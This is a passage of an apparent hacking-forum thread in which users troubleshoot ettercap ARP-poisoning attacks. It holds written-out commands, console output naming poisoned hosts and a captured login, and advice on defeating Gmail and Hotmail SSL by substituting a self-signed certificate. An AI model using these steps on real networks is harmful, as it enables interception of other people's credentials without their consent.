Page 23 of 25 FirstFirst ... 132122232425 LastLast
Results 221 to 230 of 248

Thread: Sniffing Tutorial:

  1. #221
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    3

    Default

    Ok, I've been up and down this thread trying to get this to work for me. I tried the original instructions but have since given up on using the GUI.

    So I've done the enabling of ip forwarding, and use the console command to run ettercap. Originally I would get the error where there were no host lists, however I ended up getting that fixed. I've tried a few things, but every time I run the command, it will go through and get to the point where it says it's running the autoadd script. After that, I'll try logging into gmail on my other computer, but the page loading will hang and nothing shows on the sniffing machine, like this:

    Code:
     ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on eth0... (Ethernet)
    
      eth0 ->       00:0C:29:47:1C:9D     192.168.1.109     255.255.255.0
    
    Privileges dropped to UID 65534 GID 65534...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Scanning for merged targets (255 hosts)...
    
    * |==================================================>| 100.00 %
    
    3 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : 192.168.1.1 00:1C:10:4C:92:B8
     GROUP 1 : 192.168.1.102 00:04:4B:15:C3:55
     GROUP 1 : 192.168.1.107 00:19:E3:3F:3B:0E
    
     GROUP 2 : 192.168.1.1 00:1C:10:4C:92:B8
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    Activating autoadd plugin...
    So I tried this again by removing the second IP from the command I ran (you can't see it in the above console code since it was cut off, but basically I had /192.168.1.1-255/ /192.168.1.1/). So this happens:

    Code:
     bt ~ # ettercap -Tq -M arp:remote /192.168.1.1-255/ -P autoadd
    
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on eth0... (Ethernet)
    
      eth0 ->       00:0C:29:47:1C:9D     192.168.1.109     255.255.255.0
    
    Privileges dropped to UID 65534 GID 65534...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Scanning for merged targets (255 hosts)...
    
    * |==================================================>| 100.00 %
    
    3 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : 192.168.1.1 00:1C:10:4C:92:B8
     GROUP 1 : 192.168.1.102 00:04:4B:15:C3:55
     GROUP 1 : 192.168.1.107 00:19:E3:3F:3B:0E
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    Activating autoadd plugin...
    Pretty much the same thing. So then I run the same command, but without the -P autoadd, since that was what it seemed to be hanging on, and this happens:

    Code:
     bt ~ # ettercap -Tq -M arp:remote /192.168.1.1-255/
    
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on eth0... (Ethernet)
    
      eth0 ->       00:0C:29:47:1C:9D     192.168.1.109     255.255.255.0
    
    Privileges dropped to UID 65534 GID 65534...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Scanning for merged targets (255 hosts)...
    
    * |==================================================>| 100.00 %
    
    3 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : 192.168.1.1 00:1C:10:4C:92:B8
     GROUP 1 : 192.168.1.102 00:04:4B:15:C3:55
     GROUP 1 : 192.168.1.107 00:19:E3:3F:3B:0E
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    HTTP : 208.68.234.113:80 -> USER: ten_twentyfour  PASS:   INFO: (RE forums. Can't post links with under 15 posts)
    So as you can see something worked here. The info it got at the bottom wasn't from me logging into the forums though, it was from me creating this forum account so I could post here. So it did something, but it still didn't work with gmail or hotmail or anything like that.

    Any idea what's going on here?

  2. #222
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    3

    Default

    Another question,

    what is the proper syntax for loading multiple plugins?

    if I tried something like...

    Code:
    sudo ettercap -Tq -M arp:remote // -P autoadd -P remote_browser
    only the last plugin listed seems to load.

    I've also tried...
    Code:
    sudo ettercap -Tq -M arp:remote // -P autoadd remote_browswer
    if you can help point me in the right direction I'd appreciate it

    Thanks

  3. #223
    Junior Member SBerry's Avatar
    Join Date
    Dec 2007
    Posts
    94

    Default

    ten_twentyfour - There may be a problem with the ssl cert. Try make your own and self sign it.

  4. #224
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    3

    Default

    I have no idea how I would do that for/in the Backtrack 2 environment.

  5. #225
    Junior Member SBerry's Avatar
    Join Date
    Dec 2007
    Posts
    94

    Default

    Get yourself a copy of openssl and create your certs with that

  6. #226
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    3

    Default

    Could the fact that I'm running BT2 on VMware Fusion (on my Mac) be causing issues?

  7. #227
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    10

    Default

    Hmm..I followed everything on the first post and when i start sniffing,I go log onto my gmail, hotmail, and yahoo. Then nothing came up. So its either the sites dont allow ettercap to sniff passwords anymore. Or I did something wrong. I even tried logging in using IE and Firefox.

  8. #228
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by Jo0b4k4 View Post
    Hmm..I followed everything on the first post and when i start sniffing,I go log onto my gmail, hotmail, and yahoo. Then nothing came up. So its either the sites dont allow ettercap to sniff passwords anymore. Or I did something wrong. I even tried logging in using IE and Firefox.
    All of the three pages that you mention still use SSL encryption which you are able to bypass using a MITM attack and replacing the SSL certificate with your own. I have successfully tried out ettercap on both Gmail and Hotmail quite recently.
    -Monkeys are like nature's humans.

  9. #229
    peithan
    Guest

    Default

    I've an onto some trouble with sniffing my other computers password through ssl.

    I've forwarded the traffic : echo 1 /proc/sys/ipv4/ip_forward
    Also i have edited the etter.conf file, removed the # at ip tables.

    When i start ettercap i sellect sniff, uniffied sniffing. Do a scan, ctrl plus S.
    Randomizing 63 hosts for scanning...
    Scanning the whole netmask for 63 hosts...
    60 hosts added to the hosts list...

    Then Mitm and sellect ARP poisoning. Ok.

    These hosts i can choose from:
    My workstations ip are in the list, being 213.114.108.124
    And this gateway i got is not in the list. when i use the ifconfig to check the gateway ip it says *.65 but that one isnt in the list. This gateway is provided from my isp and is not connectable, it just forwards the traffic.

    So how should i set up the sniffing? And when i just scan the hosts then start sniffing my internet kind of dies, til i cancel the arp poisoning. Shed some light on this please!

    Somehow i managed to sniff my password on my workstation yesterday, but i cant for the love of god remember what i did, and it is so frustrating. Been trying this for 3 hours soon.

  10. #230
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    22

    Default

    I cant seem to get this to work. When i do all the steps from the first page the arp poisoning wont poison. Just says "No poisoning at all" And when i try the text based stuff that wont poison either.

    I am on a wireless computer and trying to poison the computers using cable.When i run the sudo ettercap -Tq arp:remote /192.168.1.1-20/ -P autoadd -i ath0 it scans the hosts and then sniffs.

    But when i run the arp -a they still got different maccs. Can this be due to they're on a switch? I am clueless here. Help me out!

Page 23 of 25 FirstFirst ... 132122232425 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •